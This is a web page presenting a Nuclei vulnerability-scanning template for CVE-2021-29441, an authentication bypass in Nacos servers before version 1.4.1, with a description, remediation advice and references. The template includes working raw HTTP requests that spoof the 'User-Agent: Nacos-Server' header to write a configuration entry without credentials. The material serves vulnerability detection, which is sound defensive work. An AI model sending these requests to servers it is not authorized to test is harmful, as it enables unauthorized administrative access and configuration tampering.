Nacos <1.4.1 - Authentication Bypass

ID: CVE-2021-29441

Severity: critical

Author: dwisiswant0

Tags: cve2021,cve,nacos,auth-bypass,alibaba

Description

This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor thatenables Nacos servers to bypass this filter and therefore skip authentication checks.This mechanism relies on the user-agent HTTP header so it can be easily spoofed.This issue may allow any user to carry out any administrative tasks on the Nacos server.

YAML Source

id: CVE-2021-29441

info:
  name: Nacos <1.4.1 - Authentication Bypass
  author: dwisiswant0
  severity: critical
  description: |
    This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.

    In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
    Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
    enables Nacos servers to bypass this filter and therefore skip authentication checks.
    This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
    This issue may allow any user to carry out any administrative tasks on the Nacos server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.
  remediation: |
    Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441).
  reference:
    - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
    - https://github.com/alibaba/nacos/issues/4701
    - https://github.com/advisories/GHSA-36hp-jr8h-556f
    - https://github.com/alibaba/nacos/pull/4703
    - https://github.com/bakery312/Vulhub-Reproduce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-29441
    cwe-id: CWE-290
    epss-score: 0.96598
    epss-percentile: 0.99603
    cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: alibaba
    product: nacos
  tags: cve2021,cve,nacos,auth-bypass,alibaba

http:
  - raw:
      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: Nacos-Server

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 403"
          - "status_code_2 == 200"
        condition: and

      - type: dsl
        dsl:
          - "contains(body_1, 'Forbidden')"
          - "body_2 == 'true'"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"
# digest: 4a0a004730450221008b8ab583991b247988d15026822e442c7a4ce7b65a9bbf1592a120623ca03df502207181fbdd2cf0845bbd375bc40ce6cc4219b65ae3c5a57cf8919dd947824ada46:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-29441.yaml"

View on Github